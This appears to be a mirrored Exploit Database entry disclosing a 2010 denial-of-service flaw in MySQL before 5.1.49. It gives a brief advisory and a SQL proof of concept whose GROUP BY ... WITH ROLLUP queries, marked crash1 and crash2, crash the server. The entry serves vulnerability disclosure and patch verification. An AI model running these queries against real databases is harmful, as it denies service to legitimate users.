Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service

• Exploit Database
• 101 阅读

• 作者： Shane Bester
  日期： 2010-11-09
• 类别：

  • dos
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/15467/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  source: https://www.securityfocus.com/bid/42596/info   MySQL is prone to a denial-of-service vulnerability.   An attacker can exploit this issue to crash the database, denying access to legitimate users.   This issue affects versions prior to MySQL 5.1.49.   NOTE: This issue was previously covered in BID 42586 (Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities) but has been assigned its own record to better document it.   PoC:   drop table if exists <code>t1</code>; create table <code>t1</code>(<code>a</code> int)engine=myisam; insert into <code>t1</code> values (1); /*crash1*/select (<code>a</code> in (<code>a</code>,<code>a</code>)) from <code>t1</code> group by <code>a</code> with rollup; /*crash2*/select (case (<code>a</code>) when (<code>a</code>) then (<code>a</code>) end) as <code>a</code> from <code>t1</code> group by <code>a with rollup;